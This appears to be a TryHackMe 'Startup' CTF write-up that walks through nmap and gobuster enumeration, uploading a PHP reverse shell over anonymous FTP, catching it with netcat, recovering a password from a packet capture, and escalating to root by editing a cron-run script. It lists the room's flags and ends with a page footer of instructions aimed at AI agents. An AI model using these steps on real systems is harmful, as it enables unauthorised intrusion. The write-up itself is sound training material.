# Startup {% embed url="" %} ## ## Task 1: Welcome to Spice Hut!

### What is the secret spicy soup recipe? * Let's first scan the IP address using `nmap`. ``` $ nmap -sC -sV 10.10.96.227 Starting Nmap 7.92 ( https://nmap.org ) at 2023-12-06 11:24 IST Nmap scan report for 10.10.96.227 Host is up (0.13s latency). Not shown: 997 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 | ftp-syst: | STAT: | FTP server status: | Connected to 10.17.48.138 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 1 | vsFTPd 3.0.3 - secure, fast, stable |_End of status | ftp-anon: Anonymous FTP login allowed (FTP code 230) | drwxrwxrwx 2 65534 65534 4096 Nov 12 2020 ftp [NSE: writeable] | -rw-r--r-- 1 0 0 251631 Nov 12 2020 important.jpg |_-rw-r--r-- 1 0 0 208 Nov 12 2020 notice.txt 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 b9:a6:0b:84:1d:22:01:a4:01:30:48:43:61:2b:ab:94 (RSA) | 256 ec:13:25:8c:18:20:36:e6:ce:91:0e:16:26:eb:a2:be (ECDSA) |_ 256 a2:ff:2a:72:81:aa:a2:9f:55:a4:dc:92:23:e6:b4:3f (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-title: Maintenance |_http-server-header: Apache/2.4.18 (Ubuntu) Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 31.70 seconds ``` * There are three open ports: | | | | -- | ---- | | 21 | ftp | | 22 | ssh | | 80 | http | * Let's visit the machine's HTTP port through the browser.

* As we can see, there is nothing of importance on this page. * We can try to find other pages or directories using `gobuster`. ``` $ gobuster dir -u http://10.10.96.227 -w /usr/share/wordlists/dirb/common.txt =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.96.227 [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirb/common.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /.hta (Status: 403) [Size: 277] /.htaccess (Status: 403) [Size: 277] /.htpasswd (Status: 403) [Size: 277] /files (Status: 301) [Size: 312] [--> http://10.10.96.227/files/] /index.html (Status: 200) [Size: 808] /server-status (Status: 403) [Size: 277] Progress: 4614 / 4615 (99.98%) =============================================================== Finished =============================================================== ``` * Let's try out the `/files` directory. * We can login go to the FTP server of the machine. ``` $ ftp anonymous@10.10.96.227 Connected to 10.10.96.227. 220 (vsFTPd 3.0.3) 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ``` * Note that the password for anonymous login is `anonymous`. * Let's look around a bit. ``` ftp> ls 229 Entering Extended Passive Mode (|||62019|) 150 Here comes the directory listing. drwxrwxrwx 2 65534 65534 4096 Nov 12 2020 ftp -rw-r--r-- 1 0 0 251631 Nov 12 2020 important.jpg -rw-r--r-- 1 0 0 208 Nov 12 2020 notice.txt 226 Directory send OK. ftp> cd ftp 250 Directory successfully changed. ``` * We can upload a reverse shell in this directory. * We will be using the `/usr/share/webshells/php/php-reverse-shell.php` script after making some modifications.

* We replaced the IP address with our `tun0` address and set the port to a port of our choice. * Let's upload the file to the FTP server using `put`. ``` ftp> put php-reverse-shell.php local: php-reverse-shell.php remote: php-reverse-shell.php 229 Entering Extended Passive Mode (|||50625|) 150 Ok to send data. 100% |***********************************************************************************************************************************************************************************************| 5494 2.27 MiB/s 00:00 ETA 226 Transfer complete. 5494 bytes sent in 00:00 (19.80 KiB/s) ``` * Now we have to listen on the `9999` port using `netcat`. ``` $ nc -nlvp 9999 listening on [any] 9999 ... ``` * Let's go to the `/files/ftp` folder.

* All we have to do now is execute the `php-reverse-shell.php` file. * If we go back to our console, we must have a shell. ``` $ nc -nlvp 9999 listening on [any] 9999 ... connect to [10.17.48.138] from (UNKNOWN) [10.10.96.227] 37428 Linux startup 4.4.0-190-generic #220-Ubuntu SMP Fri Aug 28 23:02:15 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux 06:33:05 up 42 min, 0 users, load average: 0.00, 0.00, 0.03 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ ``` * We can stabilize the shell using the following commands: ``` python3 -c 'import pty; pty.spawn("/bin/bash")' export TERM=xterm CTRL+Z stty raw -echo; fg ``` * Let's look for the secret spicy soup recipe. ``` www-data@startup:/$ ls bin home lib mnt root srv vagrant boot incidents lib64 opt run sys var dev initrd.img lost+found proc sbin tmp vmlinuz etc initrd.img.old media recipe.txt snap usr vmlinuz.old ``` * Here, the `recipe.txt` file seems interesting. We can read it using the `cat` command. ``` www-data@startup:/$ cat recipe.txt Someone asked what our main ingredient to our spice soup is today. I figured I can't keep it a secret forever and told him it was love. ``` ### Answer ``` love ``` #### ### Question > What are the contents of user.txt? * We have to go to the `/incidents` directory. ``` www-data@startup:/incidents$ ls suspicious.pcapng ``` * Let's copy the `suspicious.pcapng` file to the `ftp` directory. ``` www-data@startup:/incidents$ cp suspicious.pcapng /var/www/html/files/ftp/ www-data@startup:/incidents$ ls /var/www/html/files/ftp/ php-reverse-shell.php suspicious.pcapng ``` * Let's look at the ftp login. ``` ftp> ls 229 Entering Extended Passive Mode (|||32073|) 150 Here comes the directory listing. -rwxrwxr-x 1 112 118 5494 Dec 06 06:28 php-reverse-shell.php -rwxr-xr-x 1 33 33 31224 Dec 06 06:55 suspicious.pcapng 226 Directory send OK. ``` * We can now download this file using the `get` command. ``` ftp> get suspicious.pcapng local: suspicious.pcapng remote: suspicious.pcapng 229 Entering Extended Passive Mode (|||41055|) 150 Opening BINARY mode data connection for suspicious.pcapng (31224 bytes). 100% |***********************************************************************************************************************************************************************************************| 31224 118.42 KiB/s 00:00 ETA 226 Transfer complete. 31224 bytes received in 00:00 (79.21 KiB/s) ``` * We can now use Wireshark to analyze the packet capture. * In frame 45 we can see that the user has entered some commands.

* Let's `Follow > TCP Stream`.

* The password for the `lennie` user is `c4ntg3t3n0ughsp1c3`. ``` www-data@startup:/$ su lennie Password: lennie@startup:/$ ``` * We can now go to `/home/lennie` and get the flag. ``` lennie@startup:/$ cd /home/lennie/ lennie@startup:~$ ls Documents scripts user.txt lennie@startup:~$ cat user.txt THM{03ce3d619b80ccbfb3b7fc81e46c0e79} ``` ### Answer ``` THM{03ce3d619b80ccbfb3b7fc81e46c0e79} ``` #### ### Question > What are the contents of root.txt? * Let's check what's inside the `scripts/` directory. ``` lennie@startup:~$ cd scripts/ lennie@startup:~/scripts$ ls planner.sh startup_list.txt ``` * We can check what the `planner.sh` file is doing using `cat`. ``` lennie@startup:~/scripts$ cat planner.sh #!/bin/bash echo $LIST > /home/lennie/scripts/startup_list.txt /etc/print.sh ``` * We can see that it execute the `/etc/print.sh` file. * Let's check that file out. ``` lennie@startup:~/scripts$ ls -la /etc/ | grep "print.sh" -rwx------ 1 lennie lennie 25 Nov 12 2020 print.sh ``` * So we can execute the `print.sh` file as `lennie`. * But before that let's modify it to get a reverse shell. * We can get a bash reverse shell from Revshells.com.

* The IP address is our `tun0` address.

* After saving the changes, we can listen on port `9998` and run the `planner.sh` file. ``` $ nc -lvnp 9998 listening on [any] 9998 ... connect to [10.17.48.138] from (UNKNOWN) [10.10.244.57] 43162 sh: 0: can't access tty; job control turned off # ``` * Let's get the root flag. ``` # ls root.txt # cat root.txt THM{f963aaa6a430f210222158ae15c3d76d} ``` ### Answer ``` THM{f963aaa6a430f210222158ae15c3d76d} ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://kunalwalavalkar.gitbook.io/write-ups/tryhackme/easy/startup.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.